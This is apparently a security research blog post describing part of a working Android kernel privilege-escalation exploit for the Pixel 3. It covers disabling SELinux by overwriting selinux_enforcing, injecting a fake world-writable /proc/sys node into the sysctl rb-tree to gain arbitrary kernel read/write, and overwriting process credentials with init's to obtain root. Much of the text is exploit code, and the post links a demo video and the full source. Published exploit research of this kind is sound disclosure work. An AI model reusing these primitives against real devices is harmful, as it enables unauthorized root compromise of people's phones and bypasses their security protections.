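Now that we know the kernel base address, we can use our write primitive to write a NULL qword over the selinux_enforcing variable and put SELinux into permissive mode. Our exploit does this before setting up the arbitrary write primitive, because the technique we use for it requires SELinux to be disabled.
After considering several options, we settled on attacking the sysctl tables the kernel uses to handle /proc/sys and all the data hanging off them. There are a number of global tables describing these variables, such as kern_table below: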

static struct ctl_table kern_table[] = {
    {
        .procname   = "sched_child_runs_first",
        .data       = &sysctl_sched_child_runs_first,
        .maxlen     = sizeof(unsigned int),
        .mode       = 0644,
        .proc_handler   = proc_dointvec,
    },
#if defined(CONFIG_PREEMPT_TRACER) || defined(CONFIG_IRQSOFF_TRACER)
    {
        .procname       = "preemptoff_tracing_threshold_ns",
        .data           = &sysctl_preemptoff_tracing_threshold_ns,
        .maxlen         = sizeof(unsigned int),
        .mode           = 0644,
        .proc_handler   = proc_dointvec,
    },
    {
        .procname       = "irqsoff_tracing_threshold_ns",
        .data           = &sysctl_irqsoff_tracing_threshold_ns,
        .maxlen         = sizeof(unsigned int),
        .mode           = 0644,
        .proc_handler   = proc_dointvec,
    },

...

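For example, the first variable is named "sched_child_runs_first", which means it can be accessed at /proc/sys/kernel/sched_child_runs_first. Its file mode is 0644, so it is writable only by root (subject to SELinux restrictions), and it is an integer. Reads and writes are handled by proc_dointvec, which converts the integer to and from its string representation when the file is accessed. The data field points to the variable's location in memory, which makes it an interesting target for obtaining an arbitrary read/write primitive.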
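We initially tried targeting some of these variables, but then realized that this table is only used during kernel initialization, so corrupting its contents would not help us much. However, the table is used to build a set of in-memory structures that define the existing sysctl variables and their permissions.
These structures can be found by walking sysctl_table_root, which contains an rb-tree of ctl_node nodes that in turn point to the ctl_table entries defining the variables themselves. Since we have a read primitive, we can walk the tree and find its left-most node, which has no children.
Under normal conditions, following only the left-child links of this tree visits the nodes in descending alphabetical order. This is the ordering rule of these trees: a left child must sort lower than its parent, and a right child higher.
Therefore, to keep the tree ordered, we use our write primitive to add a left child to the left-most node, with a name starting with "aaa". The following code finds the left-most node of the tree in prev_node, which will be the insertion point for our fake node: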

/* Now we can prepare our magic sysctl node as a child of the left-most node */

uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET;
printf("[+] sysctl_table_root = %lx\n", sysctl_table_root);
uint64_t ctl_dir = sysctl_table_root + 8;

uint64_t node = read64(ctl_dir + 80);
uint64_t prev_node;
while (node != 0) {
   prev_node = node;
   node = read64(node + 0x10); 
}
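The left-most walk and the reason for the "aaa" prefix can be shown on a plain binary search tree in userspace. This is a simplified sketch: `toy_ctl_node` is an illustrative type, names are compared with `strcmp` rather than with the kernel's own comparison routine, the directory names used in the usage example are merely examples, and rb-tree colors and parent pointers are left out.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct toy_ctl_node {
    const char *name;
    struct toy_ctl_node *left, *right;
};

/* Follow left links until there are none, like the read64() loop above. */
struct toy_ctl_node *leftmost(struct toy_ctl_node *root)
{
    struct toy_ctl_node *prev = NULL;

    for (struct toy_ctl_node *n = root; n != NULL; n = n->left)
        prev = n;
    return prev;
}

/* Attach fake as the left child of the left-most node. The ordering only
 * stays valid if fake->name sorts before the current smallest name. */
int attach_leftmost(struct toy_ctl_node *root, struct toy_ctl_node *fake)
{
    struct toy_ctl_node *where = leftmost(root);

    if (where == NULL || strcmp(fake->name, where->name) >= 0)
        return -1;
    fake->left = fake->right = NULL;
    where->left = fake;
    return 0;
}

/* Ordinary binary-search lookup by name. */
struct toy_ctl_node *lookup(struct toy_ctl_node *n, const char *name)
{
    while (n != NULL) {
        int c = strcmp(name, n->name);

        if (c == 0)
            return n;
        n = (c < 0) ? n->left : n->right;
    }
    return NULL;
}
```

Because the new name sorts before every existing one, a normal lookup descends left at each step and reaches the injected node, while lookups for existing names are unaffected.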

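To insert a new node, we need to place it somewhere in kernel memory. This is necessary because modern phones enable PAN (Privileged Access Never), which prevents the kernel from inadvertently using userland memory. Since we already have an arbitrary read primitive, we can solve this by walking our process's page tables starting from current->mm->pgd and locating the physmap address of one of our pages. Using the physmap alias of our own userspace page is also convenient, because we can easily edit the node to change the data address being targeted, which gives us a flexible read/write primitive.
We resolve the physmap alias as follows: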

/* Now resolve our mapping at 2MB. But first read memstart_addr so we can do phys_to_virt() */

memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET);
printf("[+] memstart_addr: 0x%lx\n", memstart_addr);
uint64_t mm = read64(current + MM_OFFSET);
uint64_t pgd = read64(mm + 0x40);
uint64_t entry = read64(pgd);

uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);
printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl);

/* Offset 8 for 2MB boundary */
entry = read64(next_tbl + 8);
next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);
printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl);

entry = read64(next_tbl);
uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);


*(uint64_t *)map = 0xdeadbeefbadc0ded;
if ( read64(kaddr) != 0xdeadbeefbadc0ded) {
   printf("[!] Something went wrong resolving the address of our mapping\n");
   goto out;
}

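Note that we need to read the contents of memstart_addr to be able to translate between physical addresses and the corresponding physmap addresses. In any case, after running this code we know that the data found at 0x200000 in our process address space is also available at kaddr in kernel space.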
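The arithmetic behind the page table walk can be spelled out as follows. This is a sketch under stated assumptions: three translation levels with 4 KB pages, a 39-bit kernel virtual address space (hence the `PAGE_OFFSET` value), and a linear map computed as `(pa - memstart_addr) | PAGE_OFFSET`. None of these constants come from the text above; the function names and the sample descriptor value are made up for the illustration.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT   12
#define TABLE_BITS   9                      /* 512 eight-byte entries per table */
#define PAGE_OFFSET  0xffffffc000000000ULL  /* assumption: 39-bit VA kernel     */

/* Byte offset of the entry for va inside the table at the given level
 * (0 = top level, 2 = last level). */
uint64_t entry_offset(uint64_t va, int level)
{
    int shift = PAGE_SHIFT + TABLE_BITS * (2 - level);

    return ((va >> shift) & ((1u << TABLE_BITS) - 1)) * 8;
}

/* Output address stored in a descriptor: bits [47:12], the same masking
 * as ((entry & 0xffffffffffff) >> 12) << 12 in the code above. */
uint64_t desc_to_phys(uint64_t entry)
{
    return ((entry & 0xffffffffffffULL) >> PAGE_SHIFT) << PAGE_SHIFT;
}

/* Physical address to linear-map (physmap) address, under the assumption
 * stated in the lead-in. */
uint64_t toy_phys_to_virt(uint64_t pa, uint64_t memstart_addr)
{
    return (pa - memstart_addr) | PAGE_OFFSET;
}
```

For the mapping at 0x200000 the offsets come out as 0, 8 and 0 for the three levels, which matches the reads of pgd, next_tbl + 8 and next_tbl in the walk above.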
With this, we set up the new sysctl node as follows:

/* We found the insertion place, setup the node */

uint64_t node_kaddr = kaddr;
void *node_uaddr = map;

uint64_t tbl_header_kaddr = kaddr + 0x80;
void *tbl_header_uaddr = map + 0x80;

uint64_t ctl_table_kaddr = kaddr + 0x100;
ctl_table_uaddr = map + 0x100;

uint64_t procname_kaddr = kaddr + 0x200;
void * procname_uaddr = map + 0x200;

/* Setup rb_node */
*(uint64_t *)(node_uaddr + 0x00) = prev_node;              // parent = prev_node
*(uint64_t *)(node_uaddr + 0x08) = 0;                      // right = null
*(uint64_t *)(node_uaddr + 0x10) = 0;                      // left = null

*(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr;       // my_tbl_header

*(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr;
*(uint64_t *)(tbl_header_uaddr + 0x18) = 0;                // unregistering
*(uint64_t *)(tbl_header_uaddr + 0x20) = 0;                // ctl_table_arg
*(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root;      // root
*(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root;      // set
*(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8;  // parent
*(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr;          // node
*(uint64_t *)(tbl_header_uaddr + 0x48) = 0;                // inodes.first

/* Now setup ctl_table */
uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET;
*(uint64_t *)(ctl_table_uaddr) = procname_kaddr;           // procname
*(uint64_t *)(ctl_table_uaddr + 8) = kernel_base;          // data == what to read/write
*(uint32_t *)(ctl_table_uaddr + 16) = 0x8;                 // max size
*(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec;       // proc_handler
*(uint32_t *)(ctl_table_uaddr + 20) = 0666;             // mode = rw-rw-rw-

/*
 * Compute and write the node name. We use a random name starting with aaa
 * for two reasons:
 *
 *  - Must be the first node in the tree alphabetically given where we insert it (hence aaa...)
 *
 *  - If we already run, there's a cached dentry for each name we used earlier which has dangling 
 *    pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using 
 *    this dangling pointer at open time.
 *
 * It's easier to have a unique enough name instead of figuring out how to clear the cache,
 * which would be the cleaner solution here.
 */

int fd = open("/dev/urandom", O_RDONLY);
uint32_t rnd;
read(fd, &rnd, sizeof(rnd));

sprintf(procname_uaddr, "aaa_%x", rnd);
sprintf(pathname, "/proc/sys/%s", procname_uaddr);

/* And finally use a write8 to inject this new sysctl node */
struct exp_node *write8_sysctl = node_new("write8_sysctl");
node_write8(write8_sysctl, kaddr, prev_node + 16);

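In short, this creates a file at /proc/sys/aaa_[random] with read/write permissions, and uses proc_douintvec to handle reads and writes. That function takes the data field as the pointer to read from or write to, and allows reading or writing up to maxlen bytes as unsigned integers.
With this in place, we can set up the write primitive as follows: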

void write64(uint64_t addr, uint64_t value) {
   *(uint64_t *)(ctl_table_uaddr + 8) = addr;          // data == what to read/write
   *(uint32_t *)(ctl_table_uaddr + 16) = 0x8;

   char buf[100];
   int fd = open(pathname, O_WRONLY);
   if (fd < 0) {
      printf("[!] Failed to open. Errno: %d\n", errno);
   }

   sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32));
   int ret = write(fd, buf, strlen(buf));
   if (ret < 0)
      printf("[!] Failed to write, errno: %d\n", errno);
   close(fd); 
}

void write32(uint64_t addr, uint32_t value) {
   *(uint64_t *)(ctl_table_uaddr + 8) = addr;          // data == what to read/write
   *(uint32_t *)(ctl_table_uaddr + 16) = 4;

   char buf[100];
   int fd = open(pathname, O_WRONLY);
   sprintf(buf, "%u\n", value);
   write(fd, buf, strlen(buf));
   close(fd);
}
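The reason write64 prints two numbers is that the handler stores a sequence of 32-bit unsigned integers, so a 64-bit value has to be sent as its low word followed by its high word. The sketch below shows the formatting together with a toy parser that mimics a vector-of-uints handler; `toy_store_uintvec` is a hypothetical model written for this illustration and not the kernel's implementation, and a little-endian host is assumed.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Format a 64-bit value the way write64() does: low word, then high word. */
int format_u64_as_two_u32(char *buf, size_t len, uint64_t value)
{
    return snprintf(buf, len, "%" PRIu32 " %" PRIu32 "\n",
                    (uint32_t)value, (uint32_t)(value >> 32));
}

/* Toy model of a uint-vector handler: parse decimal numbers from text and
 * store them as consecutive 32-bit words at data, up to maxlen bytes. */
size_t toy_store_uintvec(const char *text, void *data, size_t maxlen)
{
    size_t stored = 0;
    unsigned int v;
    int used;

    while (stored < maxlen / sizeof(uint32_t) &&
           sscanf(text, "%u%n", &v, &used) == 1) {
        uint32_t word = v;

        memcpy((uint8_t *)data + stored * sizeof(word), &word, sizeof(word));
        stored++;
        text += used;
    }
    return stored;
}
```

With maxlen set to 8 two words are accepted, and on a little-endian target the low word lands at the lower address, so the pair reassembles into the original 64-bit value. With maxlen set to 4, as in write32, only the first word would be stored.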

Getting Root and Cleaning Up

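Once we have read/write capabilities on the Pixel phone, getting root access is as simple as copying the credentials from a root task. Since we have already disabled SELinux, we only need to find the init credentials, bump their reference count, and copy them into our process, as follows: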

/* Set refcount to 0x100 and set our own credentials to init's */
write32(init_cred, 0x100);
write64(current + REAL_CRED_OFFSET, init_cred);
write64(current + REAL_CRED_OFFSET + 8, init_cred);

if (getuid() != 0) {
   printf("[!!] Something went wrong, we're not root!!\n");
   goto out;
}

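However, this is not enough to get a fully working root shell. We have corrupted quite a few things in memory, so exiting the current process and executing a shell would cause a crash. We therefore need to repair a few things:
1. The binder_node structures used for the write primitives were reallocated through sendmsg, but were freed again when the write was performed. We need to make sure the corresponding threads do not free these objects a second time when they return from sendmsg. To do so, we parse the thread stacks and replace every reference to these nodes with ZERO_SIZE_PTR.
2. We modified the f_inode of a struct file, which now points into the middle of an epitem. The simplest fix is to bump the file's reference count so that its release is never called.
3. While setting up the read primitive we also corrupted a field of the epitem. That field is a linked list containing a single epitem, so we can restore the list simply by copying the fllink.prev field over fllink.next.
4. We also added a fake entry to /proc/sys, which we could leave in place. In that case, however, it would point to pages that belonged to our exploit and have since been recycled by the kernel, so we decided to remove it from the rb-tree. Note that this makes the entry disappear from the userland view, but a cached path for it still exists in the kernel. Since we used a random name, it is unlikely that anyone will try to access it by opening it directly.
After cleaning up all of the above, we can finally spawn our root shell with uid 0 without crashing the phone.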

Demo Video

The following video shows the exploit being used to obtain root on the phone from an adb shell.
Video: https://static.bluefrostsecurity.de/img/labs/blog/num_valid_root.mp4

Source Code

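The exploit code described in this post and the previous one is available on the Blue Frost Security GitHub. We only tested it on a Pixel 3 running the February 2020 firmware. Other firmware versions may require adjusting the exploit. In particular, it relies on a number of kernel offsets, and structure offsets may also differ between kernel versions.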